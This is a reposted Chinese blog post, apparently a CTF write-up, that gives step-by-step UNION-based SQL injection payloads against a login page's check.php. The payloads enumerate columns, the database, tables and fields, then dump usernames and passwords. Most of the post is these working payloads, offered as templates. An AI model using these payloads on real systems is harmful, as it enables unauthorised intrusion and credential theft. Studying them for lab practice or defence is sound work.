union注入的一些模板

Others 2021-11-18 06:38:33 views: null

union注入

爆破字段数

admin ' order by 1 #

在进行到4的时候报错

/check.php?username=admin' order by 4%23&password=1

说明字段数为4

用`union`查询测试注入点（回显点位）

/check.php?username=1' union select 1,2,3%23&password=1

得到回显点位为2和3

爆破数据库

/check.php?username=1' union select 1,database(),version()%23&password=1

得到数据库的名字为geek

爆破数据表

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

得到以上两个数据表

爆破字段

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser'%23&password=1

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

两个表好像都是这个

爆破数据

/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

Guess you like

Origin blog.csdn.net/yzl_007/article/details/120735076

union注入的一些模板

union注入的一些模板

union注入的一些模板

聊聊一些sql注入的零散知识点

一些好操作

npm的一些知识

React 的一些拓展

csdn的一些命令

fastreport一些技巧

Oracle的一些查询

一些前端题库

一些很nice的项目

IntellJ IDEA 之创建第一个项目，并且配置一些必要的工具栏和代码样式主题/模板

对于个人网站的一些思考

包装类的一些API

关于Rxjava个人的一些理解

关于KNN的一些思考

记录一些难以记住的命令

关于Nginx一些知识

ggplot画图的一些好的文章

Docker的常用的一些命令

Redis 的一些面试题

maven中的一些依赖

pytorch安装中的一些命令

关于定位的一些疑问

截图保存过的一些知识

python-flask一些资料

shell中awk一些用法

design\project\一些工具

libimobiledevice 一些常用指指令

Recommended

The sixth meeting of openKylin Community Ecology Committee was successfully held

Alibaba Cloud officially releases Tongyi Qianwen 2.5

Python 3.13 releases first Beta: experimental free-threading mode and JIT, improved interactive interpreter

Stack Overflow used my code to train large AI models and banned my account.

Pop!_OS’s COSMIC desktop completes App Store listing

Report: Django is still the first choice for 74% of developers

"Internet Investment and Financing Operation in the First Quarter of 2024" Research Report

15 years ago, he was on the "FFmpeg pillar of shame", and today he still has to thank us - Tencent QQPlayer avenges its shame?

Ranking

Python handwritten digit recognition, the corresponding mathematical formulas and Detailed procedures

Der M-Chip-Mac implementiert mehrere Android-Emulatoren

CentOS 명령줄 모드에서 화면이 항상 켜져 있도록 설정 ---- 예상한 효과를 얻지 못했습니다.

Teach you step by step how to use GDB to debug programs: a comprehensive guide from entry to mastery

python3 pip ipython installation

A lot of python crawler source code sharing -- talk about the little thing about python crawler

Agile Sprint in Alpha Stage (7)

Access URL in Unity

FunctoinDemo form

MS SQL common SQL statements (6): create, modify, delete triggers and other operations sq

Daily

More

2024-05-10(34)

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)